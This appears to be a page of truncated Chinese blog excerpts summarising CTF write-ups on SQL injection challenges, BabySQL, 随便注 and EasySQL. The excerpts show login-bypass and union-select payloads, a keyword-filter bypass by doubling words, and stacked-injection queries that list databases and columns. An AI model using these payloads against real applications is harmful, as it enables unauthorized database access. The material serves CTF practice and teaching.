Loading...
[极客大挑战 2019]BabySQL首先尝试万能密码adminadmin' or 1=1#失败一般注入adminadmin' union select 1,2,3#失败这里只显示了1,2,3#,怀疑是过滤了union,select`等关键字,尝试双鞋绕过双写绕过adminadmin' ununionion selselectect 1,2,3#ok,这下就好办了爆表adminadmin' ...
[强网杯 2019]随便注这道题和前面那道差不多,也是堆叠注入sqlmap是没有灵魂的1';show databases;#1';show tables;#有两个表1'; show columns from `1919810931114514`;#1'; show columns from `words`;#这里获取flag的操作比较骚,参考以为大佬的:因为这里有两张表,内容是从words表...
sql注入学了主要还是用来打ctf的,在这里记录刷过关于sql注入的题目[SUCTF 2019]EasySQL从这道题学到了堆叠注入,顺便介绍一下Stacked injections(堆叠注入) 从字面意思就是一堆sql语句注入众所周知,每条sql语句后面都是一;结尾的,那么我们就可以多句一起使用与union的区别:union执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的...